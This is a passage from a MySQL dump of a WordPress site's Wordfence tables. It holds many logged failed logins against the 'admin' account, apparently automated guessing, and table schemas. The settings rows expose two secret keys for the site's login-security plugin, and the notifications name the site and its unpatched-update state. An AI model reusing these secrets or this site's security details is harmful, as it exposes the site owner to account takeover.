Firefox/62.0'),(6367,8516,1629706758.017245,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(6368,8517,1629707068.535461,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6369,8518,1629707608.868320,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'),(6370,8519,1629707931.367789,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6371,8520,1629708141.502980,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6372,8520,1629708141.521449,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6373,8521,1629708450.038369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Ļ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6374,8522,1629708808.367668,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6375,8523,1629709291.091522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(6376,8524,1629710553.793687,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/r�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6377,8525,1629710991.445122,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(6378,8526,1629711474.933288,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6379,8527,1629711844.663822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(6380,8528,1629712379.146912,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�;-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6381,8529,1629712705.001739,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6382,8530,1629713282.865764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H�*-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6383,8531,1629714206.195492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j)�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6384,8532,1629714383.640690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����p�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(6385,8533,1629715118.819265,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���> �','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6386,8534,1629715224.865337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����/�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(6387,8535,1629716080.057876,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(6388,8536,1629716099.679278,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J�g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6389,8537,1629716945.103292,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(6390,8538,1629717064.189582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����`�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6391,8539,1629717805.947665,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6392,8539,1629717806.056014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����B','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36'),(6393,8540,1629718022.670141,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6394,8541,1629718465.125119,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6395,8542,1629718669.032207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(6396,8543,1629718969.682673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6397,8544,1629719527.991376,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(6398,8545,1629719899.358592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���D�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6399,8546,1629720399.093439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(6400,8547,1629720897.123218,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6401,8548,1629721882.806843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6402,8549,1629722135.851717,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(6403,8550,1629722861.413021,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6404,8551,1629723011.774908,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���捫','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(6405,8552,1629723846.406227,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4��~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6406,8553,1629723885.742034,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���]n\'','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(6407,8554,1629724759.560357,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(6408,8555,1629724821.289542,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4'),(6409,8556,1629724842.496428,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6410,8557,1629725642.206930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6411,8558,1629725784.372903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6412,8559,1629726523.103535,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(6413,8560,1629726822.681207,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6414,8561,1629727408.690566,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�S','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(6415,8562,1629727831.724892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6416,8563,1629728848.529454,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6417,8564,1629729783.967881,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(6418,8565,1629729857.115762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6419,8566,1629730895.510048,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6420,8567,1629731429.562840,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Ù','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6421,8568,1629731927.229509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�W','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6422,8569,1629732982.289137,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw�\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6423,8570,1629733017.735478,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�-:','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(6424,8571,1629733081.203750,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"W#�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(6425,8572,1629734748.487915,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�A*','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(6426,8573,1629736392.587079,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(6427,8574,1629738031.175361,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6428,8575,1629739585.299224,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(6429,8576,1629739628.887289,1,'loginFailInvalidUsername','1c',0,'\0\0\0\0\0\0\0\0\0\0��%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6430,8577,1629740250.689934,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��))/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6431,8578,1629740785.754588,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���\'E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6432,8579,1629742048.757367,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6433,8580,1629744398.972706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(6434,8581,1629744942.881480,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6435,8582,1629747554.033709,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��QX4�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(6436,8583,1629750586.236823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���!','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36'),(6437,8584,1629752042.804430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(6438,8585,1629753491.220810,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\rKz','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(6439,8586,1629754702.172317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6440,8587,1629754704.534223,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6441,8588,1629754706.776570,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6442,8589,1629754707.902295,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6443,8590,1629754711.296747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6444,8591,1629754714.421919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6445,8592,1629754718.756367,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6446,8593,1629754721.440608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6447,8594,1629754725.457788,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6448,8595,1629754729.192667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6449,8596,1629754733.791811,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6450,8596,1629754735.150338,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6451,8597,1629754738.241961,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6452,8598,1629754741.987733,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6453,8599,1629754744.413352,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6454,8600,1629754748.380496,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6455,8601,1629754750.381584,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6456,8602,1629754751.507049,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6457,8603,1629754752.637899,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"}�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(6458,8605,1629754936.887526,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ϛ�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(6459,8605,1629754936.940201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ϛ�','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),(6460,8606,1629756776.592512,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0��gF�E','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_2fa_secrets`
--
DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL,
`secret` tinyblob NOT NULL,
`recovery` blob NOT NULL,
`ctime` int(10) unsigned NOT NULL,
`vtime` int(10) unsigned NOT NULL,
`mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_2fa_secrets`
--
LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_settings`
--
DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
`name` varchar(191) NOT NULL DEFAULT '',
`value` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_settings`
--
LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624360367','yes'),('ntp-offset','0.36360216140747','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','bbe99d5475d2d7458e93894af053ebd7cecec29b5c8723c626582924f787667c','yes'),('shared-symmetric-secret','dc582c057d6da2fd8b1c199a574d72d3c9887e1fe75f59dd397558d46733562e','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfnotifications`
--
DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
`id` varchar(32) NOT NULL DEFAULT '',
`new` tinyint(3) unsigned NOT NULL DEFAULT 1,
`category` varchar(255) NOT NULL,
`priority` int(11) NOT NULL DEFAULT 1000,
`ctime` int(10) unsigned NOT NULL,
`html` text NOT NULL,
`links` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfnotifications`
--
LOCK TABLES `wp_wfnotifications` WRITE;
/*!40000 ALTER TABLE `wp_wfnotifications` DISABLE KEYS */;
INSERT INTO `wp_wfnotifications` VALUES ('site-AEAAAAA',1,'wfplugin_updates',502,1629717529,'<a href=\"https://teethwhiteningproduct.co.uk/wp-admin/update-core.php\">Updates are available for WordPress (v5.8), 6 plugins, and 8 themes</a>','[]'),('site-AIAAAAA',1,'wfplugin_scan',502,1629717530,'<a href=\"https://teethwhiteningproduct.co.uk/wp-admin/admin.php?page=WordfenceScan\">21 issues found in most recent scan</a>','[]');
/*!40000 ALTER TABLE `wp_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfpendingissues`
--
DROP TABLE IF EXISTS `wp_wfpendingissues`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfpendingissues` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`time` int(10) unsigned NOT NULL,
`lastUpdated` int(10) unsigned NOT NULL,
`status` varchar(10) NOT NULL,
`type` varchar(20) NOT NULL,
`severity` tinyint(3) unsigned NOT NULL,
`ignoreP` char(32) NOT NULL,
`ignoreC` char(32) NOT NULL,
`shortMsg` varchar(255) NOT NULL,
`longMsg` text DEFAULT NULL,
`data` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `lastUpdated` (`lastUpdated`),
KEY `status` (`status`),
KEY `ignoreP` (`ignoreP`),
KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfpendingissues`
--
LOCK TABLES `wp_wfpendingissues` WRITE;
/*!40000 ALTER TABLE `wp_wfpendingissues` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfpendingissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfreversecache`
--
DROP TABLE IF EXISTS `wp_wfreversecache`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfreversecache` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`host` varchar(255) NOT NULL,
`lastUpdate` int(10) unsigned NOT NULL,
PRIMARY KEY (`IP`)
